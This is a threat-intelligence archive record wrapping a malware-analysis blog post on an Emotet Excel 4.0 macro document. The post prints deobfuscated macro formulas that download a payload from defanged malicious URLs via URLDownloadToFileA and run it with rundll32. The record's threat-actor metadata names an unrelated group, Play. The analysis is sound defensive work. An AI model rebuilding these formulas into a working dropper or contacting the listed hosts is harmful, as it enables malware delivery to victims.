{
	"id": "149c94ec-18c2-49da-bcbd-e1be8643afc3",
	"created_at": "2026-04-06T00:06:42.738297Z",
	"updated_at": "2026-04-10T03:30:33.123769Z",
	"deleted_at": null,
	"sha1_hash": "c3132775048bc9d3c7a7553dff0d9a0a9bd32908",
	"title": "Emotet’s Excel 4.0 Macros Dropping DLLs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 54211,
	"plain_text": "Emotet’s Excel 4.0 Macros Dropping DLLs\r\nPublished: 2022-01-17 · Archived: 2026-04-05 15:38:36 UTC\r\nIt’s been a little while since I checked in on Emotet to see how its first stage loaders are doing. Lately the first stage has been\r\nusing Excel 4.0 macros to drop payloads, so in this post I’ll walk through the analysis of one Emotet Excel document. If you\r\nwant to play along at home, I’m working with this sample in MalwareBazaar:\r\nhttps://bazaar.abuse.ch/sample/1a243db583013a6999761dad88d6952351fdc2cd17d2016990276a9dd11ac90b/\r\nTriaging the File\r\nAs always, we should confirm our filetype first. Let’s give it a go using file , xxd , and head .\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\nremnux@remnux:~/cases/emotet$ file nn30.xlsm\r\nnn30.xlsm: Microsoft Excel 2007+\r\nremnux@remnux:~/cases/emotet$ xxd nn30.xlsm | head\r\n00000000: 504b 0304 1400 0600 0800 0000 2100 a78b PK..........!...\r\n00000010: 2b33 c901 0000 9707 0000 1300 0802 5b43 +3............[C\r\n00000020: 6f6e 7465 6e74 5f54 7970 6573 5d2e 786d ontent_Types].xm\r\n00000030: 6c20 a204 0228 a000 0200 0000 0000 0000 l ...(..........\r\n00000040: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000050: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000060: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000070: 0000 0000 0000 0101 0000 0000 0000 0000 ................\r\n00000080: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000090: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\nThe file output says the file magic belongs to a Excel document, and the first few bytes are what I’d expect from an\r\nExcel document. The PK part of the magic is common to zip archives as well and Excel XLSX documents are similar to\r\nzip archives. The string [Content Types].xml refers to the filename of one of the XML files that make up a larger Excel\r\ndocument. If you unzip a XLSX file, you’ll find one of those files in the extracted content. All told, this is consistent with an\r\nExcel doc.\r\nAnalyzing the Document\r\nA good starting point for the analysis is olevba .\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\nremnux@remnux:~/cases/emotet$ olevba nn30.xlsm\r\nolevba 0.60 on Python 3.8.10 - http://decalage.info/python/oletools\r\n===============================================================================\r\nFILE: nn30.xlsm\r\nType: OpenXML\r\n-------------------------------------------------------------------------------\r\nVBA MACRO xlm_macro.txt\r\nin file: xlm_macro - OLE stream: 'xlm_macro'\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n' RAW EXCEL4/XLM MACRO FORMULAS:\r\n' SHEET: EWDFFEFAD, Macrosheet\r\n' CELL:E13, =FORMULA(Srieifew1!E2,E16)=FORMULA(Buuk1!P22\u0026Buuk1!H9\u0026Buuk1!L2\u0026Buuk1!B15\u0026Buuk1!B15\u0026Srieifew1!B10\u0026Srieifew1!D6\u0026Sr\r\n' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n' EMULATION - DEOBFUSCATED EXCEL4/XLM MACRO FORMULAS:\r\n' CELL:E13 , FullEvaluation , False\r\n' CELL:E18 , FullEvaluation , CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCBB\",0,\"hxxps://zml.laneso.com/packet/AlvJ8Od\r\n' CELL:E20 , FullEvaluation , IF(YHYH\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCBB\",0,\"hxxp://ostadsarma.com/wp-ad\r\n' CELL:E22 , FullEvaluation , IF(YHYH1\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCBB\",0,\"hxxp://govtjobresultbd.xy\r\n' CELL:E24 , FullEvaluation , IF(YHYH2\u003c0,CLOSE(0),)\r\n' CELL:E26 , PartialEvaluation , =EXEC(\"C:\\Windows\\SysWow64\\rundll32.exe ..\\erum.ocx,D\"\"\u0026\"\"l\"\"\u0026\"\"lR\"\"\u0026\"\"egister\"\"\u0026\"\"\r\n' CELL:E32 , FullEvaluation , RETURN()\r\n+----------+--------------------+---------------------------------------------+\r\nhttps://forensicitguy.github.io/emotet-excel4-macro-analysis/\r\nPage 1 of 2\n\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n36\r\n37\r\n38\r\n39\r\n40\r\n41\r\n42\r\n43\r\n44\r\n45\r\n|Type |Keyword |Description |\r\n+----------+--------------------+---------------------------------------------+\r\n|Suspicious|CALL |May call a DLL using Excel 4 Macros (XLM/XLF)|\r\n|Suspicious|Windows |May enumerate application windows (if |\r\n| | |combined with Shell.Application object) |\r\n|Suspicious|URLDownloadToFileA |May download files from the Internet |\r\n|Suspicious|EXEC |May run an executable file or a system |\r\n| | |command using Excel 4 Macros (XLM/XLF) |\r\n|Suspicious|Base64 Strings |Base64-encoded strings were detected, may be |\r\n| | |used to obfuscate strings (option --decode to|\r\n| | |see all) |\r\n|IOC |hxxps://zml.laneso.c|URL |\r\n| |om/packet/AlvJ8OdtSY| |\r\n| |EeeCQP/ | |\r\n|IOC |hxxp://ostadsarma.co|URL |\r\n| |m/wp-admin/JNgASjNC/| |\r\n|IOC |hxxp://govtjobresult|URL |\r\n| |bd.xyz/sjjz/UIUhOHsL| |\r\n| |qjOy9/ | |\r\n|IOC |rundll32.exe |Executable file name |\r\n|Suspicious|XLM macro |XLM macro found. It may contain malicious |\r\n| | |code |\r\n+----------+--------------------+---------------------------------------------+\r\nInterpreting the output, it looks like the document has Excel 4.0 macros that download content from these URLs:\r\nhxxps://zml.laneso[.]com/packet/AlvJ8OdtSYEeeCQP/\r\nhxxp://ostadsarma[.]com/wp-admin/JNgASjNC/\r\nhxxp://govtjobresultbd[.]xyz/sjjz/UIUhOHsLqjOy9/\r\nAnd using the URLDownloadToFileA function from urlmon.dll , the document saved the downloaded content to\r\nerum.ocx .\r\nAfterward, the document proceeded to execute C:\\Windows\\SysWow64\\rundll32.exe\r\n..\\erum.ocx,D\"\u0026\"l\"\u0026\"lR\"\u0026\"egister\"\u0026\"Serve\"\u0026\"r . The obfuscation on the DLL export reduces down to\r\nDllRegisterServer . So the process ancestry becomes excel.exe -\u003e rundll32.exe erum.ocx,DllRegisterServer .\r\nWe can confirm this by looking at a sandbox report from Tria.ge here: https://tria.ge/220115-mqldpsdhb7/behavioral1.\r\nThanks for reading!\r\nSource: https://forensicitguy.github.io/emotet-excel4-macro-analysis/\r\nhttps://forensicitguy.github.io/emotet-excel4-macro-analysis/\r\nPage 2 of 2",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://forensicitguy.github.io/emotet-excel4-macro-analysis/"
	],
	"report_names": [
		"emotet-excel4-macro-analysis"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434002,
	"ts_updated_at": 1775791833,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c3132775048bc9d3c7a7553dff0d9a0a9bd32908.pdf",
		"text": "https://archive.orkl.eu/c3132775048bc9d3c7a7553dff0d9a0a9bd32908.txt",
		"img": "https://archive.orkl.eu/c3132775048bc9d3c7a7553dff0d9a0a9bd32908.jpg"
	}
}